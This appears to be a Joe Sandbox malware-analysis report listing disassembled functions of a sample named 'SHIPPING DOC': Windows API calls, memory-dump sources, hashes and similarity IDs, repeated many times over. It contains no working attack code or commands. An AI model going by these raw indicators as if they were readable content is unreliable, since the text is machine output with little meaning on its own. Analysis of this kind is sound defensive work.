                                                                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3705125965-3916222277
                                                                                                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                      • String ID: AU3_GetPluginDetails
                                                                                                                      • API String ID: 145871493-4132174516
                                                                                                                      • Opcode ID: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                                                                                                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                      • Opcode Fuzzy Hash: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                                                                                                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: SysMonthCal32
                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 3375834691-2298589950
                                                                                                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: $<
                                                                                                                      • API String ID: 4104443479-428540627
                                                                                                                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 1682464887-234962358
                                                                                                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 1682464887-234962358
                                                                                                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 1682464887-234962358
                                                                                                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 2507767853-234962358
                                                                                                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 2507767853-234962358
                                                                                                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                      • String ID: crts
                                                                                                                      • API String ID: 943502515-3724388283
                                                                                                                      • Opcode ID: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                                                                                                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                      • Opcode Fuzzy Hash: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                                                                                                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
